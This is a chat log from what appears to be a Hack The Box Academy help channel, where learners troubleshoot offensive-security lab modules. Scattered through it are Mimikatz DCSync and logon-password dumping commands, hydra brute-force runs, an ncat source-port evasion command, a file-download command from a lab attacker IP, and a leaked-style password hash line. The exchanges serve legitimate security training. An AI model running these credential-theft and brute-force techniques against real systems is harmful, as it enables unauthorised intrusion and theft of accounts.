#modules
ahhh nevermind my question I solved it
please, i need a hint
I just needed to start an elevated shell in anyway i wanted to.
i think i get it, will try
That whole module is a direct walkthrough. That error, I think, is just saying the user isn't authorized to use WinRM.. that's it. Check the module it should walk you through it.
thanks
.
hello, i'm in Introduction to Active Directory, AD Administration: Guided Lab Part I. The instructions say to drill down into the directory but when i'm logged into the computer on AD, there are no folders. Am i missing something??
that's the wrong window. you want to open Active Directory Users and Computers
Should be “Users and Computers”
literally found it as you sent this lol, thank you
this look right?
try dsa.msc
I have a question…. Does all XXE resort to DTD? Is there any way of exploiting it with something other than Doctype?
ok now i got it, thank you
Most is DTD from what I read, but there are some that don't use DTD. Some XML parsers resolve external entities embedded in the XML directly. https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
Module: Attacking Web Applications with Ffuf
Section: Skills Assessment - Web Fuzzing
Link to section: https://academy.hackthebox.com/module/54/section/511
I've already completed this module, however, I'm just revisiting it to go through the skills assessment. The request rate seems to be quite slow. I've been having trouble since yesterday. Is it just me? The target is publicly accessible at 94.237.57.106:50556, so if you could try the same command and let me know I'd appreciate it. Thanks!
Fuzzing for subdomains with ffuf should be with the Host header and not directly in the url.
your command is wrong
recheck the module
Has anyone here embarked on the new Active Directory Pentest Path? If so, I could use some help.
I'm in Active Directory BloodHound - Edges.
The instructions said to use PowerView to change Rosy's password using the Grace account.
I was able to successfully change the password, as instructed.
The instructions then said I can RDP to SRV01 using Rosy account.
I've used xfreerdp, Remmina, and rdesktop, but none of them work.
Any advice?
They asked to fuzz for subdomains and vhosts. I know one of the answers comes from this command, as when I ran it last night I got one of the answers. @limber river
Also, I'm facing the low request rate issue even when I specify the host header.
you can use threads to make it faster
My mistake, I was wrong, apparently the command I'd run last night was vHost fuzzing and not Sub-domain 
It's suddenly fast enough without having to forcefully increase the threads or request rate, must've been some network issue yesterday. Thanks!
Hi, I want to purchase a subscription to learn secure code.. but before that I need to confirm... will hackthebox have the option to see the source code for each box and module?
No
Some modules have a source code and stuff, but you won't get the exact setup of the lab
Got it ... Thanks a lot.
hi everyone! Is there anyone using academy htb? is it only me or anyone else getting 404 error for API attack modules ip address?
Have you tried adding the bit from your section to the url?
Hey guys! I was troubleshooting with ricky earlier but things remain the same for the bruteforcing module. On the website section as well as the skill assessment 2 question there is just no way for me to ssh to the boxes. Direct connection from host machine or pwnbox wont work. Keep getting ‘Host key verification failed’
Tried resetting the target, used a different pc, used pwnbox, set the specified port. Nothing works.
Sorry I didn't fully understand your question
Did you mean http:// ? yes I tried
You’re connecting to the IP with the port. But in the section they talk about the IP + port + slug
Example
http://94.237.59.63:31874/api/v1/authentication/customers/sign-in
ooh let me try
@storm elk do you have any insight on this? 🙏🏽
Worked thanks! I was supposed to add /swagger which I didn't know lol
Let me see what I can do
Thx a bunch 🫶🏻
Is that that the login brute forcing module?
Correct!
Maybe ssh from the host is not what you’re supposed to do for Q2
hello wondering if anyone can give me a hint on this one. Working on Windows Privilege Escalation > Weak Permissions : Escalate privileges on the target host using the techniques demonstrated in this section. Submit the contents of the flag in the WeakPerms folder on the Administrator Desktop.
But thats what it says on the website section. Is it not?
What is the section name exactly
I've used rdp to get connected to the desktop - my next step is to log into the administrator desktop correct?
Dm me what you’ve tried and I’ll check it out when I’m on my pc. Is this for the web services section?
Yes, that section, I’ll dm you
Thanks. I’ll be at my pc in about 90 min
this is probably because you respawned the target which changes the SSH key, and you have it saved in ~/.ssh/known_hosts, you can delete the key in there
or i think you can try ssh -o StrictHostKeyChecking=no user@<ip>
What PDF are you talking about? Is there any mention in the module Credential Hunting in Windows of reading some PDF file?
Footprinting (SMB) How do we know it was a linux machine (referring to the last question)? The hint said linux doesn't have a c:\ drive, but what was the sign or something to tell it's a linux machine, not windows? (Thanks in adv.)
sorry, do you need help with the question or just wondering how to tell if it's windows or linux?
How do you access the All Users directory? I can't find such a thing
Aside from powershell history when using findstr command, can't find any leads to answer Q4 and Q5 of Credential Hunting in Windows. Any tips?
$ if ur shell is a user, # if root?
.. c:/ is win, simple hint:D
I'm questioning if I should continue to pursue ethical hacking or cybersecurity as a career path
It is overwhelmingly hard
I'm also wondering if AI won't soon take over this field
They already have some AI models that can find 0 day exploits
windows priv esc skill assessment 1
i found valid clsid but still get COM -> recv failed with error: 10038
Why not be the person using the AI?
when i test the clsid it works but executing the command it gives the error again
In CPTS Password Attacks Module, Protected Archives section.
The practice question is to crack a zip file called Notes.zip
But when I run john it just quits and does nothing
glitch@debian:~/practice$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Note: Passwords longer than 21 [worst case UTF-8] to 63 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:00 DONE (2024-11-21 11:39) 0g/s 23513Kp/s 23513Kc/s 23513KC/s (79knock)..*7¡Vamos!
Session completed.
It's even a fresh install because the last one gave me some issues where john wasn't able to identify some hash types.
in this one it does identify the hash type clearly because it displays Loaded 1 password hash (PKZIP [32/64])
But why doesn't it crack it?
If you look up at the top of the page, at the right you have a resources button, they give you a list of possible users and passwords
tried it, same problem
I even wrote my own python script to crack it and used it with both lists and it did not work 😲
I created my own encrypted zip file and use my script on it and it worked.
the problem must be in the zip file itself.

Maybe you have to mutate the dictionary first, but you already got it, also i recommend to specify the mode, just in case
I tried mutation too lol
I'm examining my python code to make sure it works before I blame the zip lol.
It worked on my zip file but with my own wordlist which contains the password and is short.
I'm now testing it with rockyou.txt as my file as ASCII format while rockyou is UTF-8 so maybe I have to do some modifications on it.
I'll see if specifying the mode in john makes any difference
but how to do that lol? never had to specify any modes to john
there's no mode flag
thanks @deft lily
There's a role for it to ping any mod/admin (Serious rule break)
Let's continue the verification talk in #bot-commands
O yeah my bad, i thought you used hashcat
I think they also use the fasttrack dictionary at /usr/wordlists
But i dont remember exactly
Hello y'all good hackers?
I figured it out, I was opening the file with utf-8 encoding, then I was encoding it again when providing it to the zip library lol.
I don't know how it worked for my zip file but not for the provided one.
I fixed that and used the mutated list and it worked, no john needed
Hello. Please read #welcome
Hey guys any tip regarding Attacking Enterprise networks - Web Enumeration Exploitation on this question?
I found the XSS vulnerability
I
NEED HELP
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
i cannot find any useful solution online
it says unknown variable
it worked with --disable-ssl
thank you i found solution in this thread !
awesome 🙂
i have the following situation:
1- i have openVPN running with ip 10.10.14.117.
2- running a kali VM with NAT mode.
3- performed rdp connection to a windows machine.
4- created a simple python server inside Kali using python -m http-server --bind 0.0.0.0 to allow connections on all interfaces (port 8000 by default).
issue: i can ping my openVPN IP address from within the windows machine using ping 10.10.14.117. but i can't access the python simple server using 10.10.14.117:8000.
what am i understanding wrong about networks here?
is there a firewall in place preventing outgoing connections to high/suspicious ports?
my standard "python3 -m http.server 8080" with "iwr -uri http://10.10.10.10:8080/file.txt -outfile file.txt" works usually
do you mean creating an outbound rule and specify a range of port? e.g. 10000-60000?
ah ur asking if there is a rule preventing connections
I'm not sure in which environment you are testing but there are for example prolabs that have a firewall implemented that doesn't allow connecting to suspicious ports, so your ping may reach your host but not a connection on port 8000, but 80 would work for example
i thought u are asking a question
nope the lab here is a simple file transfer module lab, where i do rdp connection and transfer files between host and target machines
so i'm sure there are no fire walls or something
hm okay, not sure why that wouldn't work then, thats a standard case that I use all the time
I dont use the --bind parameter (because it binds on 0.0.0.0 by default I think) but beyond that we do the same thing
correct i didn't use it either, i said it here just in case someone says to use it although it is not necessary
to be sure, the browser is supposed to work on the labs right? because i tried to access the server via the firefox browser on the windows target
yea that should work too, or you can try via powershell with the command I posted above
didn't work either iwr : Unable to connect to the remote server
i run openVPN on my windows host (outside the kali VM), i also run the lab on windows host, but there was never an issue with accessing to a lab from within kali VM this way.. could it cause issues on reverse connections like in this case??
Hi guys, I have a question. A few months ago I bought the academy's $500 silver membership.
I'm afraid I won't be able to finish all the modules in time, and I don't want to buy the subscription again.
if I sign up for all the modules, without completing them. Once my subscription expires, will I be able to access those modules?
You only maintain access to modules you complete 100% under the annual plan
Modules you unlock via cubes are yours in perpetuity
Anyone here done with Introduction to Sliver C2? Module: Probing the Surface
I've done that part
Can I dm you sir?
I think you can also just message here, no?
aight, just a quick Q, you've done SQL injection to identify the db user?
I tried it that way but couldn't get the answer they wanted. I ended up analyzing the web app on the disk to identify which user they use for the database interactions
ahh I see, thanks!
7. Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
What's the question
Here
Thanks. This is the command I'm using:
gobuster vhost -u http://94.237.59.180:45571 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --append-domain
Are you saying I should also add a --domain inlanefreight.htb flag to it?
iirc u have to use mimikatz on first machine to extract creds
This my memory
Use the hash
Hello I'm struggling with the Pen test wifi module final assessment question 3. Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.
I'm not able to connect there. I have the name of the network and the pass too but I'm not able to connect through GUI or even through CLI ... do ya have any suggestions please??
remember that some security mechanism could be in place, change your mac
Hello, Im currently stuck on the Information Gathering Web Edition module for DNS Zone Transfers and when attempting to perform a zone transfer as stated in the module, i.e. "dig axfr @ns1.inlanefreight.com inlanefreight.htb" OR "dig axfr @ns1.inlanefreight.com inlanefreight.com". It returns that no servers could be found and the connection refused. I did try it with those servers' IPs which also didn't work, tried exploring forums and doing some self research online and cannot seem to find a helpful step in the right way for this module
Check again whether it really says com and not htb.
It does say htb, although when performing a dig on inlanefreight.htb it won't return any valid results, even with the A parameter for IPv4
Remember that htb is not an official TLD. You must use the IP address of the target as the nameserver
Oh okay, I had an oversight there with the phrasing of that question, thank you
@everyone hello yall just got mass pinged lol
lol
Nope 😉
You have no power to do this

Good Morning guys, hope yall having a wonderful day. i just started learning and i reached Learning Progress in the Learning Process module. the final question is kinda pissing me off cuz i answered and it said incorrect answer. its about "What is the difference between the two numbers of the learning progress mentioned above" and every time i answer it says my answer is wrong
my answer was : The difference between the two numbers, (1.00)^365 = 1.00 and (1.01)^365 = 37.7, highlights the power of consistent, incremental improvement over time.
one important thing to know about the answers to the questions in the modules is that they need to be an exact match to what is expected. You can already see how your answer could be written in many different ways. So probably not what the author is looking for. You're vastly overthinking this
do you have any example of the answer for this module ?
check the hint
it said 37.7 - 1.00
which is ?
gotta lock in
37.7 - 1.0 = 36.7 ?
i tried couple of options still said my answer is wrong
I can imagine you being even more pissed off that that was the question and answer, wouldn't blame you. I guess the author just needed something to give the cubes back to you, and indeed in such a module it's hard to come up with something with an exact answer
what did you try ?
Breakdown: (1.00)^365 = 1.00: This represents no change or progress. Multiplying the same value (1.00) every day for 365 days results in no growth. (1.01)^365 = 37.7: By improving by just 1% (0.01) each day, the cumulative effect over 365 days leads to a 37.7-fold increase. this is the first one that i tried
the second one was this : The difference between the two numbers,
The difference between the two numbers, (1.00)^365 = 1.00 and (1.01)^365 = 37.7, highlights the power of consistent, incremental improvement over time.
I didn't make myself clear. The answer boxes in HTB Academy will look for an exact match to the answer. So if the recorded answer is "abc" and you reply anything other than "abc", it will be marked incorrect
that's the thing dude, there will be a million way to answer and still as you said the answer is already recorded
Reload the Page and try again
there will be a million ways to write what you are writing above, yes. Which should be a clue towards the fact that you're overthinking this
the person who was responsible for this question wasn't clear on how we can answer the question
Lets remove context. What is the difference between 5 and 2 ?
i'm not overthinking i guess i will enroll in a different module
ok
5 is bigger than 2
thank you so much for the help anyway i will probably skip it for now
"difference" is the mathematical term for the result of subtraction. so the difference between 5 and 2 is 3
Have you tried this solution?
i will try it
Is this the right wordlist to use against the hash of Notes.zip file "/usr/share/john/password.lst"? Also how long does it take to finish?
From which module?
credential hunting in linux
basically the answer was : 36.7
5 is not 2
the problem was how you can answer the question adding only numbers not letters to the answer
For this reason, please ALWAYS specify the module name and the section. 😉
A tool is mentioned in the module. Use this tool to get the password you are looking for.
Yes but the wordlist provided is for usernames and passwords.
As of now, its been an hour and jtr using this wordlist "/usr/share/john/password.lst" is still on the process of cracking the hash of the file.
Is the wordlist that I'm using the correct one?
You don't have to touch this file at all. You need the tool mentioned in the module
By the way, you will be provided with a list in this module. It will be mutated at some point. In most cases, one of these lists is the correct list. But in this case, you don't need any of the lists.
hi guys i have just started the shells and payloads module. i am now on the reverse shell section but the target won't spawn. any recommendations on what to do?
never mind i spawned it for a 4th time now and it spawned
Was able to crack it. Jesus christ the content was useless 
I see. Alright. Yeah that was pretty confusing to use the mut pass for the hash of the file.
Guys, which tier 3 offensive module would you recommend? I’ve accumulated 500.
I was able to transfer logins.json to pwnbox. But it seems like lazagne.exe cant be run on pwnbox or am I wrong?
hi guys, i have a question. What component of a report should be written in a simple to understand and non-technical manner?
The target is a Linux server, right? Linux cannot execute exe files
All of them 😉
You mean the pwnbox? Yes it is linux. So thats why I can't run lazagne.exe on pwnbox.
No, the Target Machine
ill try the .py version and run it on pwnbox
because I only have SSH connection against the target machine/IP. From that SSH Conn, I transfered the folder .mozilla to Pwnbox.
wdym, should I run the lazagne on ssh connection?
Transfer your Tool to the Target and run it there
on ssh session? Ok.
I thought I needed to establish full fledged shell to execute/run executables against the target.
If you log in with SSH, you have a shell.
So based on this information, is it also possible to run executables on the target even if you're on SMB or FTP session?
You are logging in to the target via SSH, right?
Yes im just asking
is it or it depends?
Then why FTP or SMB?
You may be able to execute commands via SMB
https://www.netexec.wiki/smb-protocol/command-execution/execute-remote-command
okay
But that has nothing to do with the module.
let me just try your suggestion first
Hi, has anyone done the HtB academy windows lateral movement module. I'm stuck on the skills assessment? Thanks in advance
error both on lazagne.py and firefox_decrypt.py
tried running it on ssh session against the target
Does anyone know what type of encryption exactly the encrypted credentials in firefox saved passwords use? I know its AES but there's a lot of AES modules for hashcat.
since I already have logins.json and can see that actual encrypted credentials, maybe I can just crack it using hashcat?
Hello everyone, in the Windows Privilege Escalation Skills Assessment (Pt. 1) I’m able to get initial foothold, but am STRUUUUGGGLING to get priv esc. I’ve tried PrintSpoofer, and tried JuicyPotato with MULTIPLE CLSIDs but keep getting the 10038 error. Even tried the GetCLSID.ps1 script to find some on the machine….to no avail. Could someone point me in the right direction?
hi im currently trying to do a reverse shell in pwnbox via a windows rdp that i connect to in pwnbox, but the rdp windows target cannot send traffic to my pwnbox. maybe i have the wrong ip but i did ip -a to find out my pwnbox's local ip but it doesn't seem to work. any help maybe? im new to this thanks : )
the module is shells and payloads
Im join my friend
You have to upload the complete package, not just the executable file
I see.. thank you so much
ok i figured it out, so the problem was that i was typing in the vpn ip instead of the local ip, rookie mistake
Not only Garfield likes Lazagne 😉
Hey everyone.
Need some help. I'm stuck on the Linux Priv esc, logrotate module.
What exactly is not working?
Hi, could anybody help me with the Skills Assessment in Advanced Deserialization Attacks? I've got SecureAuth.DevToken and try to use a gadget for JSON.Net. Am I on the right track? I can't use ObjectDataProvider as it is forbidden, it seems. Other gadgets from ysoserial-c# didn't help me
https://academy.hackthebox.com/module/163/section/1549 im having issues with this
i really have no idea why this isnt working
but its a common thing after some research
I'm pretty sure you need to import PowerView.
Ah, I missed that. I only saw PowerSploit and Recon 
You using the latest PowerView?
that worked i love you
Hi ! Good day!
Can you help me please? I'm in HTB DACLs I module, I'm in Password Abuse section, I'm stuck on the last part, abusing Marcos' account to get the gMSA of the htb-svc$ account to get the contents of the flag.txt file, I already have the hash of the htb account, I tried to connect with pth-winexe, with psexec, winrm, crackmapexec, and others, but it refuses the connection, then I try to do pth with mimikatz but to run it I need to access as administrator, but I don't have those credentials. What should I do to get that flag, or what am I doing wrong? Thanks for your help.
hey do i have to worry about my vm crashing when i'm using john or a similar password cracker? i think i dedicated 4 gb of ram and 4 processors to the vm
Hey in the introduction to windows evasion static analysis section i dont see a C:\tools directory to safely put the payload i want to encrypt and all. anyone any help?
are you sure that you are on the correct VM (Evasion-Dev)?
Ah they gave me a ip i rdp'd into that
It should be able crack most passwords fast enough in the modules
if I remember correctly, the Evasion-Dev-VM is only accessible from the very first section. All other sections should spawn the target.
Oh i see
It’s good to have hashcat or John on your host too
But we need to attack the target with the tools right
yes
So if there are different targets, each target should contain a tools folder right
Since we need a tools folder that isn't checked by defender to initially put our malicious code and compile it, right
None of the targets have a tools folder.
You develop on the Evasion-Dev and then transfer them over to the target.
Oh that wasn't mentioned there
It's in the Introduction
firefox encrypted data?
i dont think we have anything in hashcat for that right now
but if you have some example data we could potentially add it if its something that we can work on
that said, i think most of that browser data is encrypted via DPAPI
or in the case of some of the sqlitedbs, i think it's sqlcipher with a few different ways for it to be keyed
htb academy not giving me a mark as complete option refreshed and everything still not appearing?
nvm im autistic i didnt enter the question answer
Hey guys any tip regarding Attacking Enterprise networks - Web Enumeration Exploitation on this question?
I found an XSS vulnerability and tried some payloads.. and reverse shells or getting files but no luck.. Any tip?
It says idor
So I am doing the wifi pentesting academy module and I have finished pretty much every part, but I can't figure out how to connect to the wifi network. I've found the SSID and the necessary password, and I have tried connecting over the terminal as well. I made sure to use the correct configuration (WPA2) but no matter what I do I keep getting the same error. Does anyone have a solution to this, or any hints from someone who has completed this module? I'm not sure if i'm the only one who's encountered this problem.
So does anyone know the reason (If there is one) some people get this output when trying to use SMBmap?
$ smbmap -H 10.129.167.7 -v
[SMBMap ASCII art banner]
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] 10.129.167.7 is running Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:ATTCSVC-LINUX)
[*] Closed 1 connections
Can you help me please? I'm in HTB DACLs I module, I'm in Password Abuse section, I'm stuck on the last part, abusing Marcos' account to get the gMSA of the htb-svc$ account to get the contents of the flag.txt file, I already have the hash of the htb account, I tried to connect with pth-winexe, with psexec, winrm, crackmapexec, and others, but it refuses the connection, then I try to do pth with mimikatz but to run it I need to access as administrator, but I don't have those credentials. What should I do to get that flag, or what am I doing wrong? Thanks for your help.
Module: SQL Injection Fundamentals
Part: Skills Assessment
I have question about initial Access. I dont know what to do, I discovered union injection but that brings me nowhere. Its output isn't readable and have no idea where could i write/read from
is it just impossible to use -A and -D RND:5 together in nmap ? im tryna use it on the lab and it just fails when i try to use them both
I don't see why the two would be incompatible, but maybe you're just stressing the connection. Maybe try toning things back with a -T2?
Both options generate some serious traffic.
SO
I JUST FINISHED IT
this means that i can cancel the sub and i still get access to it and any changes made correct
yes, that's what they say.
it seems too good to be true
Yea I wondered if that includes lab access as well. I imagine it does, but that's the only part that seems like a great deal.
Once you've learned the content though I can't imagine someone revisiting the labs regularly enough to cost too much on their side.
exactly i will have to go over some stuff a few times as well
hey so try and focus the most on finding the path to write the shell to, remember that the goal here isnt to read information from databases, look for a way to get the shell, its shown in the previous sections
Okay, thanks!
youre welcome!
I mean its prob the same as you buy it
As in the content doesn't change all that often? Right, that's what I'm thinking. It doesn't cost them anything to allow access to the reading material. People spinning up resources could cost them, but you only get so much out of the labs at a certain point.
there were two updates to BF logins
Hi, I am a beginner to the HTB and i just started the Module SOC. trying to do a SOC module and In a question it says "navigate to http://[Target IP]:5601, " How do i navigate to it ? The instruction are not clear, Pasting in web browser does not work. How do i do complete this task ?
you will have to connect to the VPN and spawn the target
Anyone? Still stuck on this hours later 😅
hi I am stuck on question 3 of pass the hash section on password attacks module. I've gotten David's login info and NTLM hash but its not letting me authenticate with him.
in the spoiler I posted evidence that I did in fact do this
sudo ncat -nv --source-port 53 10.129.87.1 50000
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
libnsock mksock_bind_addr(): Bind to 0.0.0.0:53 failed (IOD #1): Address already in use (98)
Ncat: TIMEOUT.
why do i get this error firewall evasion lab nmap - hard
so that's not David's password on dc01 and the hash is clearly not the right hash
so I'm confused
because when I enter the hash in question 3 it shows it is the wrong answer
sorted this
What is question 3?
Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?
so that hash should be the right hash
do I need to use Invoke-TheHash?
because that's not working either
mimikatz # lsadump::dcsync
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
ERROR kuhl_m_lsadump_dcsync ; Missing user or guid argument
do I need to switch it to local?
Use the user you're using
ok
mimikatz # lsadump::dcsync /user:Administrator
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
does same thing
its weird I thought I had it
what am I doing wrong?
Did you do privilege::debug already? Not sure if it’s going to make a difference
I don’t have notes on this module
makes no difference
Ohh wait
Try sekurlsa::logonpasswords

I dont remember, but maybe you have to dump the SAM or cached passwords
Noice
i will say this. The AEN is fun. i couldnt get thru it by myself so im gonna go back after a few months and try again. but like man. AEN really was fun
Cube sale blackfriday 🙏 pls
What mod 3 y recommend
Idk if this is the right place to ask this but im new here so hi:)) ive created an account using my university email and i was wondering if i can still access the material presented in the modules (following a job path rn) after the email will not be available anymore or when i will stop the student subscription. Any ideas? Cause otherwise i would like to make some notes since the material is really cool :))
Hello everyone, in the Windows Privilege Escalation Skills Assessment (Pt. 1) I’m able to get initial foothold, but am STRUUUUGGGLING to get priv esc. I’ve tried PrintSpoofer, and tried JuicyPotato with MULTIPLE CLSIDs but keep getting the 10038 error. Even tried the GetCLSID.ps1 script to find some on the machine….to no avail. Could someone point me in the right direction?
how do this is also for pass the hash section of password attacks module
I can't RDP in as mark
do I need to use david's hash to log in via pass the hash into dc01 too?
I can't RDP in as julio either
this is for question 4 of the module
now I have David's hash
do I not need to do it from within Windows?
Maybe try and PTH with David's hash to launch a cmd prompt?
I know but do I try to get a reverse shell?
do I do it from Linux box?
What’s the question
I mean a session would prolly work.
ok so I can do it from Linux box
Don't overcomplicate it.
ok
The tools are provided in C:\tools, so I would keep running things from there, otherwise you would need to set up a pivot to reach the 172 network.
ok wait
I would review this part of the section Pass the Hash with Mimikatz (Windows)
I am
Well maybe try a different tool.
hold on I'm logged in as julio
ok I'm not able to log in as julio either
just opens powershell. will try more soon this coffee shop is closing
hello,
I'm doing the hacking wordpress module and up to enumerating for plugins with wpscan, however I don't have an api key and it seems it won't do plugins without it?
https://wpscan.com/ you sign up here and create an account, you'll get an API key that's good for 25 requests per day on the free plan.
Kinda stinks that the module requires creating an account with a third party service to complete it
pretty sure you can still do it without that if you know how, but wpscan is an amazing tool that you'd want to sign up for anyway.
@quasi wave please do not spoil content, you can ask your question without revealing info like that
try #boxes
what channel is that? it says i have no access
got it thanks
Hi. I'm working on Footprinting. I've got an issue when I'm finishing the Footprinting Lab - Medium level. Here's what I've done so far
- Found ||*sa * credentials in the alex's directory||
- Log into the MSSQL server management using ||both found password and the default password||
- It seems that I wasn't able to log into the MSSQL server management
Are there any steps or hints that I could have missed so far? thanks in advance
looks like target ACADEMY-ATTCOMSVC-LIN
@ https://academy.hackthebox.com/module/116/section/1165
it's not spawning with the ftp service needed for the task.
Spawned for me. Try doing CTRL+SHIFT+R and spawning it again.
Maybe try another user on the machine
You mean try another user aside from ||sa and alex||? Because I've tried with that user and the error still persists
it did at 3rd reset 😅
maybe log in another way
Aight, lemme try for another way, thanks
ok so hydra for some reason just is not working with rdp
i accidentally found the correct credentials with metasploit and when i use them individually it works fine but when i use the provided username and password wordlists i watch it try the correct credentials in real time and then tell me they're not valid
what command are you using
hydra -L username.list -P password.list rdp://[target ip]
crackmapexec fails entirely for some reason and i'm about to see if medusa works
i'm just reading the docs because i have no idea how to actually use it yet
nope did not work
maybe try crowbar too, great fast tool
make sure the password and username are actually in those lists
should work
i used hydra for ssh earlier in the module and it worked fine
10.129.62.1
that's the spawned target ip?
that ip doesn't seem right .1 is usually the gateway
if you included the module and section it would help immensely, all i can say is that it worked for me
password attacks - network services
it's clearly not an issue with the target IP because it works when i just give it the credentials
and i cracked the passwords for winrm, ssh, and smb just fine
no i mean, they don't spawn ending in .1 that i've seen. that's generally a reserved IP for the gateway for the vlan.
oh yeah i agree but i don't think that's the issue
do you have that target spawned right now that ends in .1?
i'm currently resetting the target
my guess is you missed the last character or something
i was copy and pasting directly from hackthebox
and again it worked just fine with the same ip with three other network protocols
yeah but it's not a valid ip
i know but that doesn't explain why only hydra wasn't working on only rdp only under those specific conditions
how to tell if it's windows or linux coz after enumerating i got C:\ drive but hint pointed towards it was linux and i m confused lol
you clearly missed my question haha
yeah i'm getting the same thing as you. if i just put the name and password only in the list it works, if i just put the name in the username list and leave the password list it fails.
i have notes showing hydra worked before, so maybe something changed with the box. might want to report in #1234357888114364508
will do
interestingly crowbar isn't working either but the metasploit smb_login module accidentally found the credentials for rdp
my notes show hydra so i think i used crowbar for ssh bruting
never mind i got the subnet wrong
ok, thx
what the fuck
ok so i'm running a hydra scan that's projected to take 8 hours at maximum speed but the machines have a maximum uptime of 6 hours. what do i do
Footprinting (SMB) How do we know it was a linux machine (referring to last question). Hint said linux doesn't have a c:\ drive, what was the sign or something to tell it's a linux machine and not windows?
The most I’ve waited in a module was 45-50 mins
Shouldn’t take that long
as in it shouldn't be taking 8 hours or it's normal for it to say it's going to take 8 hours and then take significantly less time than that
It shouldn’t take more than an hour to get the answer
alright i'll try again tomorrow
In footprinting lab - hard skill assessment, why can the snmpv3 port be accessed with a community string? (I've scanned the version of the snmp port and it said snmpv3). I need an explanation
I mean why can the snmpv3 port be accessed with snmpwalk v2c?
Nmap can report incorrect info
Owwhhh. I just found out about that, thank you sm.
Module: https://academy.hackthebox.com/module/147/section/1319
Question: On the shadow file and opasswd file, is the salt embedded in the hash itself or not? Because in the module, the command did not provide the salt at all when cracking the hash of shadow and opasswd
cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1
This is the salt right? $HjFAfYTG
Why do you care about the salt?
Because I want to know if I do need the salt when cracking a hash that has a salt.
Also it's asking for the root user, not cry0l1t3
How are you gonna crack a password without the salt?
it's not about who the user is. Do I need to specify the salt in hashcat or is it embedded already in the hash itself?
.
alright
yeah noted on this one
Rule 1: don't overthink
If it doesn't tell you you need xyz extra thing then don't concern yourself with it
Like ordering a burger and saying you also want the ingredients that are already part of a burger
As much as I don't want to. There must be some variations on the exam, meaning there will be more than one path to take in order for you to gain something. Yes for CTFs that's the way, but on the exam and in the real world I think that is not the case.
But I want to know what makes a burger a burger to the most littlest detail 😆
Hello guys regarding Wi-Fi Penetration Testing Basics - Skills Assessment module last question: Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.
HOW 😄
I've done ping, curl and nothing
try wget
It comes pre-made, you don't need to put it together
If you want a dive, look at the example hashes on hashcat wiki
Hi ! Can someone help me
I am in API attack module's Broken Object Property Level Authorization section.
The module said nothing about Product ID, how am I supposed to finish the second question of the fifth section?
The hint says to focus on 2 endpoints. Using the first endpoint I've created a customer order, but to use the second one I need the Product ID and I can not find it
hello can anyone help me in Attacking Wi-Fi Protected Setup - Skills Assessment: What is the WPS PIN for the WiFi network named HackTheBox-Corp? i tried all the possible attacks and it's not working
Why is it whenever I transfer a shadow.bak file to pwnbox it has no filename or a blackout filename?
Is it due to file protection system on the target machine? Or its about the way how I transfer sensitive files?
Why is it that any .bak file I created on pwnbox has blacked out filename?
even on ls -la the .bak file I create is blacked out
how can I use unshadow if every .bak file on pwnbox has blacked out filename?
nvm.. was able to fix it by changing permissions
post your question
is rockyou the right wordlist when cracking unshadowed.hashes?
hi everyone, what is the best way to know what kind of query is used on the backend database to input or retrieve data when testing for SQL injection? For example if i know this is how a login page retrieves credentials (SELECT * FROM login WHERE username = 'tom' AND password = 'some';) to authenticate a user I can manipulate it in various ways
It depends. In Password Attacks, rockyou is actually always the wrong list. There, the list provided in the module or the list created in the module is the correct list.
I see.. alright thanks man
so that's why it's been taking hours already and rockyou cannot crack the unshadowed file
Knowing the code is actually only possible with Whitebox Pentesting.
thanks
Hi guys, I'm stuck with DNS submodule in Attacking Common Services. Do you have any hint about it?
What is not working?
The official hint recommends to use the subbrute script, but I don't know how to build the arguments neither ./names.txt nor ./resolvers.txt 😔
check the section again, it is described
Hi, doing the wi-fi penetration testing basics module, and have a question regarding the wireless interfaces. Section "wi-fi interfaces", one of the questions is how many wifi networks are available. I noticed a difference in response between piped and not piped output of iwlist wlan0 scan, can someone explain why that is?
Example output:
```
wifi@WiFiIntro:~$ iwlist wlan0 scan
wlan0 No scan results
wifi@WiFiIntro:~$ iwlist wlan0 scan | grep 'Cell\|Quality\|ESSID\|IEEE'
Cell 01 - Address: D8:D6:3D:EB:29:D5
...SNIP...
```
Connected with xfreerdp if it matters.
Are you still stuck on this one?
resolvers.txt must contain your target IP
Ty for the clue, I'll try to take a closer look at the chapter again as facsmilae said. thx again!
What are the new T3 defensive modules about is there a CDSA Pro cert dropping in future ?
Nothing has been announced yet. But the fact that HTB earns money with these certificates and now offers Tier III modules for Blue Teams suggests that there will also be a Blue Team Tier III certificate in the future. Tier III certificates have been published or at least announced for Web and AD. It would therefore only be logical to also have a Blue Team certificate at this level.
But as I said, nothing has been announced and is therefore pure speculation
Thanks I was assuming something like that
Finally nailed Lateral Movement Module Skills Assessment! ... it was... an absolute mission
It turned out i was in a rabbit hole
lol its so annoying when that happens, hope i was of help
